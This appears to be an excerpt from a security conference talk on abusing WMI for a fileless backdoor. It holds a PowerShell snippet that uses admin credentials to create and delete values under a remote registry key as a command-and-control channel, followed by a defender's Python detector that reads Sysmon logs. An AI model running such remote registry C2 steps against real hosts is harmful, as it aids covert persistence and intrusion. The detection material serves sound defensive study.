Persistent Asynchronous and Fileless Backdoor
us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent Asynchronous-And-Fileless-Backdoor
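WMI Attacks – C2 Communication (Registry) – “Pull” Attack

Create a registry key remotely

    $Credential = Get-Credential 'WIN-B85AAA7ST4U\Administrator'
    # Connection parameters shared by every call (splatted with @CommonArgs)
    $CommonArgs = @{
        Credential = $Credential
        ComputerName = '192.168.72.131'
    }
    # HKEY_LOCAL_MACHINE hive constant (0x80000002)
    $HKLM = 2147483650
    # Create the key on the remote host through the StdRegProv WMI class
    Invoke-WmiMethod @CommonArgs -Class StdRegProv -Name CreateKey -ArgumentList $HKLM, 'SOFTWARE\EvilKey'
    # Delete the 'Result' value under that key
    Invoke-WmiMethod @CommonArgs -Class StdRegProv -Name DeleteValue -ArgumentList $HKLM, 'SOFTWARE\EvilKey', 'Result'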
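A defender-side check for the activity on this slide, as an added example that is not from the original deck: it groups registry writes performed by the WMI provider host by key and reports keys that were created and then used for value traffic. It assumes Sysmon registry logging (event IDs 12 and 13, with the fields Image, EventType and TargetObject) on the target and that StdRegProv calls run inside WmiPrvSE.exe; the sample records and the allowlist prefix are constructed.

```python
from collections import defaultdict

WMI_HOST = "\\wmiprvse.exe"              # assumed host process for StdRegProv calls
VALUE_OPS = {"SetValue", "DeleteValue"}  # TargetObject ends in the value name
ALLOWLIST = ("HKLM\\SOFTWARE\\Microsoft\\Wbem\\",)  # hypothetical baseline prefix

def key_of(event):
    """Return the registry key an event touches (value name stripped)."""
    target = event["TargetObject"]
    if event["EventType"] in VALUE_OPS:
        target = target.rsplit("\\", 1)[0]
    return target

def wmi_registry_activity(events):
    """Group registry operations made by WmiPrvSE.exe by key, in log order."""
    allowed = tuple(p.upper() for p in ALLOWLIST)
    by_key = defaultdict(list)
    for ev in events:
        if not ev["Image"].lower().endswith(WMI_HOST):
            continue                      # not the WMI provider host
        key = key_of(ev)
        if (key.upper() + "\\").startswith(allowed):
            continue                      # known-good location
        by_key[key].append(ev["EventType"])
    return dict(by_key)

def suspicious_keys(events):
    """Keys WmiPrvSE.exe created and then read/wrote values under."""
    return sorted(k for k, ops in wmi_registry_activity(events).items()
                  if "CreateKey" in ops and VALUE_OPS & set(ops))

WMIPRVSE = "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe"
# Constructed sample records (not from a real host), Sysmon field names.
SAMPLE = [
    {"EventID": 12, "EventType": "CreateKey", "Image": WMIPRVSE,
     "TargetObject": "HKLM\\SOFTWARE\\EvilKey"},
    {"EventID": 13, "EventType": "SetValue", "Image": "C:\\Windows\\regedit.exe",
     "TargetObject": "HKLM\\SOFTWARE\\Vendor\\App\\Setting"},
    {"EventID": 13, "EventType": "SetValue", "Image": WMIPRVSE,
     "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Wbem\\CIMOM\\Constructed"},
    {"EventID": 12, "EventType": "DeleteValue", "Image": WMIPRVSE,
     "TargetObject": "HKLM\\SOFTWARE\\EvilKey\\Result"},
]

if __name__ == "__main__":
    for key in suspicious_keys(SAMPLE):
        print(key, wmi_registry_activity(SAMPLE)[key])
```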